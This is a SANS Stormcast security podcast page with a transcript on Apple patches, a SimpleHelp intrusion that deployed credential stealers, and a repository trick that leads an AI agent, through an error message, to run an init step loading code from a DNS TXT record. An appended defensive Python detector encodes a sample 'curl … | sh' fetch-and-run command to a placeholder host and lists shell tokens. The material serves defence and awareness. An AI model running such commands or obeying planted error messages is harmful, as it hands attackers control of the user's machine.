SANS Stormcast Wednesday, July 1st, 2026: Apple Patches; SimpleHelp Exploit; Git DNS Tricks
Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9990.mp3
June 2026 Apple Updates
https://isc.sans.edu/diary/June%202026%20Apple%20Updates/33114
SimpleHelp Exploit used to deploy TaskWeaver
https://blackpointcyber.com/blog/a-djinn-in-the-machine-taskweavers-node-js-intrusion-chain/
DNS Tricks to Load Malware into Cloned Repository
https://0din.ai/blog/clone-this-repo-and-i-own-your-machine
My Upcoming Classes
https://www.sans.org/profiles/dr-johannes-ullrich
| Course | Location | Dates |
| --- | --- | --- |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Jul 13th - Jul 18th 2026 |
| Application Security: Securing Web Apps, APIs, and Microservices | Online (British Summer Time) | Jul 27th - Aug 1st 2026 |
| Application Security: Securing Web Apps, APIs, and Microservices | Las Vegas | Sep 21st - Sep 25th 2026 |
| Network Monitoring and Threat Detection In-Depth | Amsterdam | Nov 9th - Nov 14th 2026 |
| Application Security: Securing Web Apps, APIs, and Microservices | Washington | Dec 14th - Dec 18th 2026 |
Podcast Transcript
Hello and welcome to the Wednesday, July 1st, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Riyadh, Saudi Arabia. And this episode is brought to you by the SANS.edu Graduate Certificate Program in Industrial Control System Security.

Well, Apple did release updates this week with security patches for iOS, iPadOS, macOS and Safari. So this lineup is a little bit different than what we usually see from Apple. Apple typically updates all of its operating systems. And also, well, we don't really have the same number of vulnerabilities being addressed as usual, but a smaller number, 28 vulnerabilities total. Most of these vulnerabilities are WebKit vulnerabilities, and that also explains the focus on iOS and macOS. The other operating systems like watchOS and such, of course, are less exposed to WebKit. There are a couple of kernel vulnerabilities that are also being addressed here, and these vulnerabilities will potentially also affect the other operating systems like watchOS, visionOS and tvOS. So I expect that there will be an update for the other operating systems relatively shortly. Part of the reasoning behind this update was also that some of these vulnerabilities had already been addressed in beta versions of the next major release of iOS, iPadOS and macOS.

And MDR company Blackpoint did release a blog post outlining a recent intrusion that they have observed against SimpleHelp. SimpleHelp is one of those remote tech support platforms. So enterprises use it to basically be able to reach out and support systems across their network. And it suffered, well, not even two weeks ago, from an OpenID Connect bypass. So that essentially allowed an authentication bypass, and an attacker is able to authenticate as a technician, and with that is able to then reach out to remote systems that are connected to this particular SimpleHelp instance.

What Blackpoint observed is that the attacker did deploy a fairly obfuscated JavaScript file. They call it jQuery.js, but it's not related to the well-known jQuery framework. And this JavaScript file is then executed via Node.js and used to deploy additional malware. In particular, they observed credential stealers. So in this case, the attacker went after the usual sort of SSH and cloud credentials and such, likely to further compromise affected networks. Haven't seen the ransomware word here in this particular write-up, but wouldn't be surprised if this particular vulnerability, which isn't all that terribly hard to exploit, would soon be used also to deploy ransomware. That just sort of fits what this type of vulnerability is often used for.

And Mozilla's 0din lab published a blog post outlining an interesting attack against, well, yet again, cloning a repository from Git. Doesn't have to be GitHub, really sort of any kind of repository here would work. And the trick they're playing here is that if you're using an AI agent in order to help you with the cloning and then ask it to execute the actual code that was downloaded, well, there will be an error message that you first need to initialize, to init, the software that you just downloaded. And that, well, in itself isn't really all that suspicious. But what that triggers is a DNS lookup that will then download additional code in the form of a TXT record and execute it. So the trick here is that the repository as downloaded is clean. It does not contain any malware, and the malware is really just loaded as the repository is initialized using the DNS lookup. Pretty neat. Just talked in class today about all the ways you can use DNS as a covert channel. Yet another sort of little trick that you can play here with DNS.

Well, and that's it for today. Thanks for listening. Thanks for liking. Thanks for recommending this podcast, and talk to you again tomorrow. Bye.
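A defender-side heuristic for the DNS TXT trick described above, added here as an example and not taken from the 0din post or the podcast: it scans TXT answers (for instance from resolver logs) for bodies that look like code to be executed rather than the usual SPF/DMARC/verification strings. The sample records, the known-prefix allowlist, the shell-token list and the 200-byte length threshold are all constructed assumptions to tune against your own resolver baseline.

```python
import base64
import re

# Constructed sample TXT answers as (name, rtype, rdata); not taken from the 0din post.
SAMPLE_TXT_ANSWERS = [
    ("init.example-repo.invalid", "TXT",
     base64.b64encode(b"curl -s http://x.invalid/stage2 | sh").decode()),
    ("_dmarc.example.com", "TXT", "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"),
    ("example.com", "TXT", "v=spf1 include:_spf.example.com -all"),
    ("notes.example.com", "TXT", "office hours are 9 to 5"),
]

# TXT uses that legitimately look odd and should not be flagged (assumed allowlist).
KNOWN_PREFIXES = ("v=spf1", "v=DMARC1", "v=DKIM1", "google-site-verification=")
# Tokens suggesting the record body is meant to be executed, not read (assumed list).
SHELL_TOKENS = re.compile(r"\b(sh|bash|curl|wget|eval|exec|powershell|node)\b")

def decode_if_base64_text(s):
    """Return the decoded text if s is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(s, validate=True)
    except (ValueError, TypeError):
        return None
    if raw and all(b in (9, 10, 13) or 32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None

def score_txt_record(rdata):
    """List the reasons a TXT rdata looks like a code carrier; empty means not flagged."""
    reasons = []
    if rdata.startswith(KNOWN_PREFIXES):
        return reasons
    decoded = decode_if_base64_text(rdata)
    if decoded is not None:
        reasons.append("base64-decodable payload")
        if SHELL_TOKENS.search(decoded):
            reasons.append("decoded text contains shell tokens")
    elif SHELL_TOKENS.search(rdata):
        reasons.append("cleartext contains shell tokens")
    if len(rdata) > 200:  # threshold is an assumption; tune to your resolver's baseline
        reasons.append("unusually long TXT rdata")
    return reasons

def flag_records(records):
    """Return [(name, reasons)] for TXT answers worth a closer look."""
    scored = [(n, score_txt_record(r)) for n, t, r in records if t == "TXT"]
    return [(n, reasons) for n, reasons in scored if reasons]
```

Pair the flagged names with process telemetry from the host that issued the lookup: a TXT query fired by a freshly cloned repository's init step is the sequence the post describes.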